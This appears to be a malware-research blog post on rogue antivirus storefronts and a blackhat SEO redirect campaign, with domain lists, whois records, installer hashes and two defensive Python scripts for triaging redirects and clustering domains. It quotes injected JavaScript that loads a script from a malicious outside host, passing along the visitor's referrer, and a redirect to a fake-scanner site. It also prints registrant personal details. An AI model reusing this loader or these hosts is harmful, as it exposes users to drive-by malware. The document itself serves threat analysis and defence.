hxxp://browsersecurityinfo.com

Redirects to
hxxp://ieprotectionlist.com/2/

Redirects to
hxxp://bennysaintscathedral.com/buy.php?nh=1&id=

Redirects to
hxxp://secure.buysecuritysoftwareonline.com/buy.php?nh=1&id=

Whois entry for browsersecurityinfo.com 83.133.123.113
Name: Gupta C Deepak
Address: 580 Booth
City: Edmonton
Province/state: AB
Country: CA
Postal Code: 787843
Whois entry for ieprotectionlist.com 83.133.123.109
Name: Van M Jane
Address: Rod. 5C 41 – Km. 4,8
City: Santa Catarina
Province/state: Santa Catarina
Country: BR
Postal Code: 88122
Whois entry for bennysaintscathedral.com 83.133.123.113
Name: Gayao M Mel
Address: 16-18 Kingsley Close
City: Melbourne
Province/state: Melbourne
Country: RU
Postal Code: 31781
Whois entry for buysecuritysoftwareonline.com 83.133.123.109
Name: Rauf K Abdur
Address: 79-E, Al-Rehman Chamber
City: Islamabad
Province/state: Islamabad
Country: PK
Postal Code: 53241
This website lists quite a few rogue security programs for sale and directs the user to a payment page to purchase the program. You can see from the screenshots below that they try to make the pages look legitimate, but to a trained eye this scam will be spotted immediately.

Whois entry for programstoremovespyware.com 94.76.212.238
Name: Godbout B Martin
Address: 2345 Yonge St, Suite 900
City: Toronto
Province/state: Ontario
Country: CA
Postal Code: 42577
Whois entry for adware-removal-solution.com 89.248.168.46
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Whois entry for onlinesoftwarebilling.com 78.46.216.236
Dmitriy Blydov (dmitriyblydov@gmail.com)
yl. Syhodolnaya 169/105
Simferopol
Other,95000
UA
Tel. +380.638550739
Whois entry for advanedprospywarescanner.com 69.4.230.205 78.46.251.41 83.133.126.155
Privat person
Mikhail Peshkov xors678@freebbmail.com
+74952783440 fax: +74952783440
ul. Rozanova 28-51
Moskva Moskovskay oblast 126105
ru
Setup-8d5_02022.exe
Result: 3/41 (7.32%)
MD5: 02daf3cadf61788710833c6c8b8988f9
VirusTotal
ThreatExpert Analysis
hxxp://advanedprospywarescanner.com/download/
There is a blackhat SEO campaign that redirects users to fake scanning websites in order to infect them. Each of these domains has many pages stuffed with keywords so that they rank highly in search results. Once a result is clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains, as well as how the redirect chain works.
<script type="text/javascript" src="/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoVCp_qCODoee2QvAwsxetjrz1uKFNY2brg"></script>
The following JavaScript is then loaded (it picks an available URL-encoding function, then writes a second script tag whose URL carries the page's referrer):
var t3dbj5es5;
if (typeof(encodeURIComponent) == 'function') t3dbj5es5 = encodeURIComponent;
else if (typeof(escape) == 'function') t3dbj5es5 = escape;
else t3dbj5es5 = function (text) { return text; };
document.write('<script src="http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=' + (document.referrer ? t3dbj5es5(document.referrer) : '') + '" type="text/javascript"></script>');
The contents of the new page are below.
document.location.href='http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1';
Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day, as selected by the malware distributors.
ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127
UPDATED: 7/5/09
tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227
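The chain above can be recovered from saved captures without running any of the JavaScript. The following is an added example (not the blog's own code): it embeds the three quoted stages as constructed sample input, pulls out every script source and location assignment with regular expressions, defangs the results, and explains why each finding deserves a second look. The page host name "seo-landing-page.example" is a placeholder, not something from the post.

```python
"""Static triage of captured redirect stages (added example, not the blog's own code).

The three samples below are constructed from the snippets quoted in the post
above: the injected counter <script>, the loader that writes a second
<script> tag carrying document.referrer, and the final location redirect.
Nothing here executes JavaScript or contacts a host; the goal is to recover
the chain of destinations from saved captures and emit them defanged.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# --- constructed sample captures (from the post's quoted snippets) ---
STAGE1_HTML = (
    '<script type="text/javascript" src="/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9'
    'vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoVCp_qCODoee2QvAwsxetjrz1uKFNY2brg"></script>'
)
STAGE2_JS = (
    "var t3dbj5es5;"
    "if (typeof(encodeURIComponent) == 'function') t3dbj5es5 = encodeURIComponent;"
    "else if (typeof(escape) == 'function') t3dbj5es5 = escape;"
    "else t3dbj5es5 = function (text) { return text; };"
    "document.write('<script src=\"http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=' "
    "+ (document.referrer ? t3dbj5es5(document.referrer) : '') "
    "+ '\" type=\"text/javascript\"></script>');"
)
STAGE3_JS = "document.location.href='http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1';"

# A <script ... src="..."> tag. The captured value stops at the next quote of either
# kind, which is exactly where the loader in STAGE2_JS concatenates the referrer.
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# Assignments to the usual spellings of the location object.
LOCATION = re.compile(
    r'(?:document|window|top|self)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
DOC_WRITE = re.compile(r'document\.write\s*\(', re.I)
REFERRER = re.compile(r'document\.referrer', re.I)


@dataclass
class Finding:
    kind: str             # "script" (a resource load) or "redirect" (navigation)
    url: str              # defanged destination
    dynamic: bool         # tag was produced at runtime via document.write
    leaks_referrer: bool  # document.referrer is appended to the request


def defang(url: str) -> str:
    return re.sub(r'^http(s?)://', r'hxxp\1://', url, flags=re.I)


def refang(url: str) -> str:
    return re.sub(r'^hxxp(s?)://', r'http\1://', url, flags=re.I)


def analyse(content: str) -> list:
    """Extract every destination a browser would fetch or navigate to."""
    dynamic = bool(DOC_WRITE.search(content))
    leaks = bool(REFERRER.search(content))
    found = [Finding("script", defang(m.group(1)), dynamic, leaks)
             for m in SCRIPT_SRC.finditer(content)]
    found += [Finding("redirect", defang(m.group(1)), False, False)
              for m in LOCATION.finditer(content)]
    return found


def chain(stages) -> list:
    """Flatten successive captures into the ordered list of defanged destinations."""
    return [f.url for stage in stages for f in analyse(stage)]


def reasons(f: Finding, page_host: str) -> list:
    """Why an analyst should look twice at a finding, relative to the page it came from."""
    out = []
    host = urlsplit(refang(f.url)).netloc.lower()
    if host and host != page_host.lower():
        out.append(f"loads from third-party host {host}")
    if f.dynamic:
        out.append("tag written at runtime via document.write")
    if f.leaks_referrer:
        out.append("document.referrer is appended to the request")
    return out


if __name__ == "__main__":
    # "seo-landing-page.example" is a placeholder for the compromised page's host.
    for url in chain([STAGE1_HTML, STAGE2_JS, STAGE3_JS]):
        print(url)
    for f in analyse(STAGE2_JS):
        print(f.kind, f.url, reasons(f, "seo-landing-page.example"))
```

Run stand-alone it prints the three defanged destinations in order, then flags the xozkyaf.com script as third-party, written at runtime, and carrying the referrer. The same-quote-class trick in SCRIPT_SRC is deliberate: a static regex cannot evaluate the string concatenation, so it captures the fixed prefix of the URL and leaves the referrer-dependent tail out.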
hxxp://74.86.144.178/url/go.php?sid=15&q=
Redirects to
hxxp://avyciso.cn/?wm=70126 &q=
Whois entry for avyciso.cn 64.20.38.172
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server: ns1.pubilcnameserver7.com
Name Server: ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 16:31
Expiration Date: 2009-12-30 16:31
This has the same payload as in my previous post here.
http://74.86.144.178/url/go.php?sid=15&q=Liquid+Foam+Urethane+For+Race+Cars
Redirects to
hxxp://avomec.cn/?wm=70126%20&q=Liquid+Foam+Urethane+For+Race+Cars
Whois entry for avomec.cn 195.95.151.174
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互联科技有限公司
Name Server: ns1.pubilcnameserver7.com
Name Server: ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 15:40
Expiration Date: 2009-12-30 15:40
installer_70126.exe
Result: 20/41 (48.79%)
MD5: a85fc3c3122d9dfb7a7ced965559d999
VirusTotal
ThreatExpert Analysis
hxxp://avomec.cn/
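The two .cn whois records above share an administrative e-mail and name servers, and the storefront domains at the top of the post sit next to each other on one /24. Pivoting on those shared values is how an analyst turns a handful of sightings into a cluster to block. The following is an added example (not the blog's own code): the whois texts and domain/IP pairs are constructed from entries quoted in the post, the parser tolerates the "Key:value" lines with no space, and union-find joins any records that share a pivot value. The grouping is generic and works on any mix of whois-backed and hosting-only records.

```python
"""Pivoting on shared registration and hosting attributes (added example, not the blog's own code).

Inputs are constructed from entries quoted in the post: the two .cn whois
records that share an administrative e-mail and name servers, and the
storefront domains from the top of the post that sit on the same /24.
Any record that shares a pivot value with another lands in the same cluster.
"""
import ipaddress
from collections import defaultdict

WHOIS_AVYCISO = """\
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 16:31
"""
WHOIS_AVOMEC = """\
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 15:40
"""

PIVOTS = ("email", "ns", "net")


def parse_whois(text: str) -> dict:
    """Return {lower-cased field: [values]}, keeping repeated fields such as Name Server."""
    fields = defaultdict(list)
    for line in text.splitlines():
        key, sep, value = line.partition(":")   # tolerates "Key:value" with no space
        if sep and value.strip():
            fields[key.strip().lower()].append(value.strip())
    return dict(fields)


def net24(ip: str) -> str:
    """Collapse an address to its /24 so neighbouring hosts pivot together."""
    return str(ipaddress.ip_network(f"{ip}/24", strict=False))


def record(domain: str, ips, whois_text: str = "") -> dict:
    """Build a record from observed IPs and, where the post quotes one, a whois text."""
    w = parse_whois(whois_text)
    return {
        "domain": domain,
        "email": {v.lower() for v in w.get("administrative email", [])},
        "ns": {v.lower() for v in w.get("name server", [])},
        "net": {net24(ip) for ip in ips},
    }


def shared_pivots(a: dict, b: dict) -> dict:
    """The pivot values two records have in common; empty if they are unrelated."""
    return {k: a[k] & b[k] for k in PIVOTS if a[k] & b[k]}


def cluster(records) -> list:
    """Union-find over pivot values: records sharing any value join one cluster."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]   # path halving
            i = parent[i]
        return i

    first_seen = {}
    for i, rec in enumerate(records):
        for key in PIVOTS:
            for value in rec[key]:
                token = (key, value)
                if token in first_seen:
                    parent[find(i)] = find(first_seen[token])
                else:
                    first_seen[token] = i
    groups = defaultdict(list)
    for i, rec in enumerate(records):
        groups[find(i)].append(rec["domain"])
    return sorted(sorted(g) for g in groups.values())


# Constructed from the post: domain, observed IP(s), whois text where the post quotes one.
RECORDS = [
    record("avyciso.cn", ["64.20.38.172"], WHOIS_AVYCISO),
    record("avomec.cn", ["195.95.151.174"], WHOIS_AVOMEC),
    record("browsersecurityinfo.com", ["83.133.123.113"]),
    record("ieprotectionlist.com", ["83.133.123.109"]),
    record("bennysaintscathedral.com", ["83.133.123.113"]),
    record("buysecuritysoftwareonline.com", ["83.133.123.109"]),
    record("ouvthweg.com", ["194.110.162.89"]),
]

if __name__ == "__main__":
    for group in cluster(RECORDS):
        print(group)
    print(shared_pivots(RECORDS[0], RECORDS[1]))
```

The /24 pivot is a deliberate trade-off: it links the four storefront domains even though they use two distinct addresses, at the cost of occasionally pulling in an unrelated neighbour on a shared hosting range, so treat a net-only link as weaker than a shared e-mail or name server pair.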